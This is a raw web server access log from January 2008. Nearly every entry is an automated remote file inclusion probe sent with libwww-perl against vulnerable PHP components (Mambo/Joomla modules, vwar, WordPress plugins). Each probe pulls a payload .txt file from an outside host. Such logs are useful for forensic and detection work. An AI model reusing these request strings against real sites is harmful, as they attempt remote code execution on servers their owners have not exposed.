70.86.201.130 - - [13/Jan/2008:07:13:12 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:07:13:12 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:07:13:12 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.77.94.81 - - [13/Jan/2008:07:13:53 -0800] "GET /logs/access_071229.log/index.php?log=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [13/Jan/2008:07:13:53 -0800] "GET /index.php?log=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [13/Jan/2008:07:13:54 -0800] "GET /logs/index.php?log=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [13/Jan/2008:07:15:58 -0800] "GET /tmp/?M=A HTTP/1.0" 200 2164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:07:18:21 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:07:18:21 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:07:18:21 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:07:22:22 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:07:22:23 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:07:22:23 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.20.5 - - [13/Jan/2008:07:22:23 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [13/Jan/2008:07:22:32 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [13/Jan/2008:07:22:33 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [13/Jan/2008:07:22:40 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.138.63 - - [13/Jan/2008:07:22:40 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.19.219 - - [13/Jan/2008:07:26:02 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:07:26:42 -0800] "GET /logs/access_071229.log/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:07:26:43 -0800] "GET /?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:07:26:43 -0800] "GET /logs/access_071229.log/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:07:26:43 -0800] "GET /logs/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 200 29967 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:07:26:43 -0800] "GET /?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:07:26:43 -0800] "GET /logs/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 200 29967 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.113 - - [13/Jan/2008:07:28:42 -0800] "GET /plans/A2_MASTER_SUITE_PLAN.pdf HTTP/1.0" 200 2297833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.188.218.110 - - [13/Jan/2008:07:29:34 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [13/Jan/2008:07:29:34 -0800] "GET //skin/zero_vote/error.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [13/Jan/2008:07:29:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [13/Jan/2008:07:32:17 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.72 - - [13/Jan/2008:07:33:31 -0800] "GET /megumi/Necklace/?N=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [13/Jan/2008:07:33:37 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.152 - - [13/Jan/2008:07:35:45 -0800] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:07:36:35 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:07:36:35 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.65.96.182 - - [13/Jan/2008:07:36:45 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/ppl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.232.85.19 - - [13/Jan/2008:07:39:04 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.232.85.19 - - [13/Jan/2008:07:39:07 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [13/Jan/2008:07:39:58 -0800] "GET /funny/?M=D HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.76.186.87 - - [13/Jan/2008:07:40:09 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.165.146 - - [13/Jan/2008:07:50:54 -0800] "GET /logs/access_071229.log/inurl:%94/index.php?option=com_rsgallery%94http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.165.146 - - [13/Jan/2008:07:50:54 -0800] "GET /inurl:%94/index.php?option=com_rsgallery%94http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.165.146 - - [13/Jan/2008:07:50:54 -0800] "GET /logs/inurl:%94/index.php?option=com_rsgallery%94http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.19 - - [13/Jan/2008:07:57:10 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arkitektsolli.no//script/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [13/Jan/2008:07:57:10 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arkitektsolli.no//script/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [13/Jan/2008:07:57:10 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arkitektsolli.no//script/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.8.71 - - [13/Jan/2008:07:57:45 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.188.218.110 - - [13/Jan/2008:07:59:34 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [13/Jan/2008:07:59:34 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [13/Jan/2008:07:59:34 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.251.180 - - [13/Jan/2008:08:01:47 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.251.180 - - [13/Jan/2008:08:01:47 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.251.180 - - [13/Jan/2008:08:01:47 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:08:02:56 -0800] "GET /logs/access_071222.log/odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:08:02:58 -0800] "GET /logs/odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:08:03:11 -0800] "GET /logs/access_071222.log/odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:08:03:13 -0800] "GET /logs/odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:08:03:27 -0800] "GET /logs/access_071222.log/odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:08:03:29 -0800] "GET /logs/odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.5.54.19 - - [13/Jan/2008:08:03:42 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.arkitektsolli.no//script/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [13/Jan/2008:08:03:42 -0800] "GET /convert/mvcw.php?vwar_root=http://www.arkitektsolli.no//script/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [13/Jan/2008:08:03:42 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.arkitektsolli.no//script/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.19 - - [13/Jan/2008:08:03:44 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.arkitektsolli.no//script/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.76.186.87 - - [13/Jan/2008:08:04:16 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [13/Jan/2008:08:04:19 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [13/Jan/2008:08:04:26 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [13/Jan/2008:08:04:56 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.128.204.2 - - [13/Jan/2008:08:05:17 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.128.204.2 - - [13/Jan/2008:08:05:18 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.241.213.160 - - [13/Jan/2008:08:07:24 -0800] "GET /logs/access_071225.log//index.php?body=http://hornydate.co.uk/asc???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.160 - - [13/Jan/2008:08:07:25 -0800] "GET //index.php?body=http://hornydate.co.uk/asc???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.160 - - [13/Jan/2008:08:07:25 -0800] "GET /logs//index.php?body=http://hornydate.co.uk/asc???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.67.192.5 - - [13/Jan/2008:08:07:31 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.166 - - [13/Jan/2008:08:07:56 -0800] "GET /retreat1/webcam/?S=A HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:08:06 -0800] "GET /logs/access_071222.log//?CONFIG_EXT[LIB_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:08:06 -0800] "GET //?CONFIG_EXT[LIB_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:08:07 -0800] "GET /logs//?CONFIG_EXT[LIB_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 200 29972 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:08:37 -0800] "GET /logs/access_071222.log//?CONFIG_EXT[LIB_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:08:38 -0800] "GET //?CONFIG_EXT[LIB_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:08:38 -0800] "GET /logs//?CONFIG_EXT[LIB_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 30590 "-" "libwww-perl/5.805" "www.dmulk.com"
128.103.8.13 - - [13/Jan/2008:08:09:14 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://neonamerica.com/login? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.103.8.13 - - [13/Jan/2008:08:09:23 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://neonamerica.com/login? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.3.29.2 - - [13/Jan/2008:08:09:23 -0800] "GET //redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://www.glur.de//.asd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
81.3.29.2 - - [13/Jan/2008:08:09:24 -0800] "GET /logs//redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://www.glur.de//.asd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
128.103.8.13 - - [13/Jan/2008:08:09:34 -0800] "GET /logs/access_071229.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://neonamerica.com/login? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.1.215.164 - - [13/Jan/2008:08:10:06 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:10:12 -0800] "GET /logs/access_071222.log/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:10:12 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:10:12 -0800] "GET /logs/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:10:18 -0800] "GET /logs/access_071222.log//?CONFIG_EXT[LIB_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:10:18 -0800] "GET //?CONFIG_EXT[LIB_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:10:19 -0800] "GET /logs//?CONFIG_EXT[LIB_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 200 29972 "-" "libwww-perl/5.805" "www.dmulk.com"
128.103.8.13 - - [13/Jan/2008:08:10:23 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://neonamerica.com/login? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:08:11:21 -0800] "GET /logs/access_071127.log/odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:08:11:29 -0800] "GET /logs/access_071127.log/odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:11:38 -0800] "GET /logs/access_071222.log/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:11:39 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:11:39 -0800] "GET /logs/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:08:11:50 -0800] "GET /logs/access_071127.log/odules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.73.200.244 - - [13/Jan/2008:08:11:55 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://slackche.hit.bg/test2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:12:51 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:12:51 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:12:51 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:12:56 -0800] "GET /logs/access_071229.log//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:12:56 -0800] "GET //?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:12:57 -0800] "GET /logs//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 200 29972 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [13/Jan/2008:08:13:05 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://www.fieldhockey.be/site/login? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
205.234.132.157 - - [13/Jan/2008:08:13:05 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.fieldhockey.be/site/login? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:13:08 -0800] "GET /logs/access_071229.log/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:13:08 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:13:08 -0800] "GET /logs/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:13:14 -0800] "GET /logs/access_071225.log//?CONFIG_EXT[LIB_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [13/Jan/2008:08:13:16 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:14:03 -0800] "GET /logs/access_071214.log//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:14:06 -0800] "GET /logs/access_071214.log/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:14:12 -0800] "GET /logs/access_071225.log/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:14:15 -0800] "GET /logs/access_071222.log/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:14:16 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:14:16 -0800] "GET /logs/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
